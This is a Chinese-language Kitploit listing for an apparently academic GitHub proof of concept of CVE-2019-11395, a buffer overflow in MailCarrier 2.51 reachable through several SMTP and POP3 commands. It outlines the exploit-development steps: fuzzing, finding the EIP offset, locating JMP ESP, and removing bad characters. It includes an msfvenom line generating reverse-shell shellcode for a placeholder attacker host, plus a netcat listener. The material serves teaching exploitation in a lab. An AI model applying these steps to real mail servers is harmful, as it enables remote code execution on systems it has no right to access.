Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-11395 — 以学术目的理解缓冲区溢出漏洞的概念验证,以CVE-2019-11395为背景 | Kitploit
工具/GitHubGitHub/rafaelbicas/cve-2019-11395
Payload生成漏洞分析漏洞利用Shellcode模糊测试学习与教育二进制利用
GitHubrafaelbicas/cve-2019-11395

CVE-2019-11395

以学术目的理解缓冲区溢出漏洞的概念验证,以CVE-2019-11395为背景

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-11395

概述

本概念验证(PoC)展示了 MailCarrier 2.51 中的缓冲区溢出漏洞,允许远程攻击者通过长字符串执行任意代码。该漏洞可通过以下流程利用:

  • SMTP RCPT TO
  • POP3 USER
  • POP3 LIST
  • POP3 TOP
  • POP3 RETR

本项目旨在提供一种学术方法,帮助理解缓冲区溢出是如何工作的。


⚠️ 警告

在运行任何测试之前,切勿使用你的生产环境进行初始实验。相反,应创建一个与生产环境类似的实验室环境,以免出现问题或意外后果。


🔧 准备工作

1. 发现漏洞

  • 使用模糊测试技术确定使应用程序崩溃所需的大致字节数。

2. 查找偏移量

  • 一旦发生崩溃,使用:
    root@kitploit:~
    msf-pattern_create -l <字节数>
    

这有助于确定偏移量,即覆盖 EIP 所需的精确字节数。

  • 使用以下命令确认偏移量:
    root@kitploit:~
    msf-pattern_offset -q <EIP寄存器上的字节> -l <字节数>
    

这样可以识别控制 EIP 所需的精确字节数。

3. 查找 JMP 或 CALL 指令

  • 使用以下命令定位指令:
    root@kitploit:~
    JMP ESP
    CALL ESP
    

我们将使用这个地址来重定向执行。请注意 ASLR、SafeSEH 或其他保护机制。

4. 识别坏字符

  • 在 Immunity Debugger 中使用 Mona 工具检查坏字符。

5. 生成 Shellcode

  • 生成 shellcode 并排除坏字符:
    root@kitploit:~
    msfvenom -p <shellcode> LHOST=<攻击者IP> LPORT=443 -b "<坏字符列表>" exitfunc=thread -f python
    

6. 添加 NOP

  • 在 payload 中插入 NOP(\x90)指令以提高稳定性。

7. 建立连接

  • 使用 netcat(nc)创建反向 shell 并连接到目标。
下载工具